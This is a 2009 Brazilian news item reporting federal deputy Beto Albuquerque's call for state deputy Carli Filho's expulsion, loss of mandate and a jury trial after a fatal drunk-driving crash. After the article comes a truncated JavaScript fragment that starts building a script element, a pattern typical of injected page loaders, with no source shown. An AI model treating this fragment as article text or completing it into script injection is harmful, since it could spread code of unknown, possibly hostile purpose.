Beto pede expulsão do PSB e júri popular para deputado que provocou duas mortes no trânsito

May 29 2009
(0) Comments

O Nacional – Passo Fundo, 29/05/2009

Em Brasília, o presidente da Frente Parlamentar em Defesa do Trânsito Seguro, deputado federal Beto Albuquerque (PSB-RS), defendeu esta semana a expulsão do PSB do deputado estadual do Paraná Fernando Ribas Carli Filho por dirigir alcoolizado e ter provocado acidente de trânsito, no qual duas pessoas perderam a vida. Além disso, Albuquerque afirmou que Carli Filho, com a carteira de motorista suspensa por acumular 130 pontos em infrações de trânsito, deve ser submetido a júri popular pelo crime que cometeu. “Quem, como este deputado, enche a cabeça de bebida alcoólica e dirige a 160 quilômetros por hora não pode afirmar que não pretendia praticar o crime”, afirma Albuquerque. “Beber, dirigir, correr e matar é homicídio doloso”, completou.

Na instância do Poder Legislativo, Albuquerque defende que o parlamentar paranaense deve perder o mandato por ter faltado com decoro. “Como deputado estadual ele tinha a obrigação de dar o exemplo para os demais motoristas, sendo que o que aconteceu foi exatamente o contrário”, avaliou.

Outro alerta feito por Albuquerque foi para que o inquérito policial do caso seja conduzido de forma exemplar e que a denúncia ao Ministério Público seja muito bem fundamentada, não apenas por se tratar de um deputado, mas por ser o caso de um ser humano que matou outros por conduzir um veículo sob efeito de álcool. “Precisamos lutar para punir não somente este deputado, mas também todos os motoristas que desrespeitam a lei. As penas têm que ser para todos”, alertou.

var d=document;var s=d.createElement(‘script’);